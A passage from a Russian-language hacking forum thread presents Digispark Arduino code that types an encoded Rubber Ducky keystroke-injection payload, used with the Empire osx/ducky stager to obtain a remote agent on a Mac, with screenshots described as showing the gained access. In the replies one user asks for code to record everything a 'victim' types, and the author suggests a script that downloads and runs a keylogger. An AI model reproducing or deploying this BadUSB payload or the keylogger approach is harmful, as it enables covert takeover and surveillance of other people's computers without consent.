0x27, 0x0, 0x12, 0x0, 0x4, 0x0, 0xc, 0x0, 0x17, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0xe, 0x2, 0x16, 0x2, 0x18, 0x2, 0x1c, 0x0, 0x11, 0x2, 0x17, 0x2, 0x1c, 0x2, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0x9, 0x2, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0x19, 0x2, 0x27, 0x0, 0x16, 0x0, 0x18, 0x2, 0x1e, 0x0, 0x17, 0x0, 0x14, 0x0, 0x1b, 0x2, 0x17, 0x2, 0x1e, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0x13, 0x0, 0x7, 0x0, 0xf, 0x2, 0x9, 0x2, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0x19, 0x2, 0x27, 0x0, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x2, 0x22, 0x0, 0xb, 0x0, 0x6, 0x0, 0xb, 0x2, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0x10, 0x0, 0x14, 0x2, 0x12, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0xb, 0x0, 0x1c, 0x0, 0xe, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x6, 0x2, 0xb, 0x0, 0xd, 0x0, 0x4, 0x0, 0xa, 0x2, 0x9, 0x2, 0x1c, 0x0, 0xe, 0x2, 0x19, 0x2, 0x22, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1c, 0x0, 0xb, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0xe, 0x2, 0x1e, 0x0, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0xf, 0x0, 0x27, 0x0, 0x13, 0x0, 0xd, 0x2, 0x17, 0x2, 0xc, 0x2, 0x1e, 0x0, 0x11, 0x2, 0xf, 0x0, 0x27, 0x0, 0x13, 0x0, 0xe, 0x2, 0x14, 0x2, 0x13, 0x0, 0xf, 0x0, 0x8, 0x0, 0xa, 0x2, 0x19, 0x2, 0xd, 0x0, 0xe, 0x2, 0x6, 0x2, 0x6, 0x0, 0x11, 0x0, 0xf, 0x2, 0x10, 0x0, 0x13, 0x0, 0x19, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x21, 0x0, 0x12, 0x0, 0x5, 0x0, 0x20, 0x0, 0x19, 0x2, 0x27, 0x0, 0xe, 0x2, 0x16, 0x2, 0xe, 0x0, 0x2e, 0x0, 0x34, 0x0, 0x27, 0x2, 0x27, 0x2, 0x33, 0x0, 0x34, 0x2, 0x2c, 0x0, 0x31, 0x2, 0x2c, 0x0, 0x13, 0x0, 0x1c, 0x0, 0x17, 0x0, 0xb, 0x0, 0x12, 0x0, 0x11, 0x0, 0x2c, 0x0, 0x24, 0x2, 0x28, 0x0, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb
};
int i = 1; //how many times the payload should run (-1 for endless loop)
bool blink=true;[/SIZE][/SIZE]

[SIZE=4][SIZE=4]void setup()
{
  // initialize the digital pin as an output.
  pinMode(0, OUTPUT); //LED on Model B
  pinMode(1, OUTPUT); //LED on Model A
  DigiKeyboard.delay(1000); //wait 1000 milliseconds before first run, to give target time to initialize
}[/SIZE][/SIZE]

[SIZE=4][SIZE=4]void loop()
{[/SIZE][/SIZE]

[SIZE=4][SIZE=4]  //should code be runned in this loop?
  if (i != 0) {
    DigiKeyboard.sendKeyStroke(0);[/SIZE][/SIZE]

[SIZE=4][SIZE=4]    //parse raw duckencoder script
    for (int i=0; i<DUCK_LEN; i+=2)
    {
      uint8_t key = pgm_read_word_near(duckraw + i);
      uint8_t mod = pgm_read_word_near(duckraw + i+1);
      if (key == 0) //delay (a delay>255 is split into a sequence of delays)
      {
        DigiKeyboard.delay(mod);
      }
      else DigiKeyboard.sendKeyStroke(key,mod);
    }
    i--;
    DigiKeyboard.delay(5000); //wait 5000 milliseconds before next loop iteration[/SIZE][/SIZE]

[SIZE=4][SIZE=4]  }
  // Тут должен был быть код, заставляющий мигать светодиоды по окончанию скрипта
}
Готово! Теперь всё компилируется, и мы готовы карать неверных тестировать свой компьютер.
Выделение_005.png


Для полноценной работы стоит запариться над открытием терминала и английским вводом, но тут я использую дефолтный Empire-osx/ducky

Такой результат получаем на выходе:
Снимок экрана из 2017-09-01 12-35-22.png


Получен всеми желанный агент и доступ к компьютеру
Снимок экрана из 2017-09-01 12-35-26.png


Да-да, доступ к своему же компьютеру
7B3USXaa0Vw.jpg


И скажите теперь, что linux/osx - безопасные системы!
 
Последнее редактирование модератором:
I

IioS

Позволь узнать, как ты создал такой виджет(справа на скринах), откуда скачал, как "обустроил"
 

Dr.Lafa

Green Team
30.12.2016
507
1 049
BIT
0
Позволь узнать, как ты создал такой виджет(справа на скринах), откуда скачал, как "обустроил"
это conky
apt-get install conky
Настроить можно в файле .concyrc в домашней папке, в интернете есть много красивых конфигов
 
G

good player

позволь узнать,а сможешь написать такой код с типа клавиатурным червём.Чтобы записать на Bad Usb всё что вводит жертва????
 

Dr.Lafa

Green Team
30.12.2016
507
1 049
BIT
0
позволь узнать,а сможешь написать такой код с типа клавиатурным червём.Чтобы записать на Bad Usb всё что вводит жертва????
С rubber ducky возможно. С digispark нет, т.к. туда просто не получится записать данные без перепрошивки. Да и нецелесообразно это с 8 килобайт памяти. Будет уместней написать скрипт, который бы скачивал и запускал кейлоггер.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!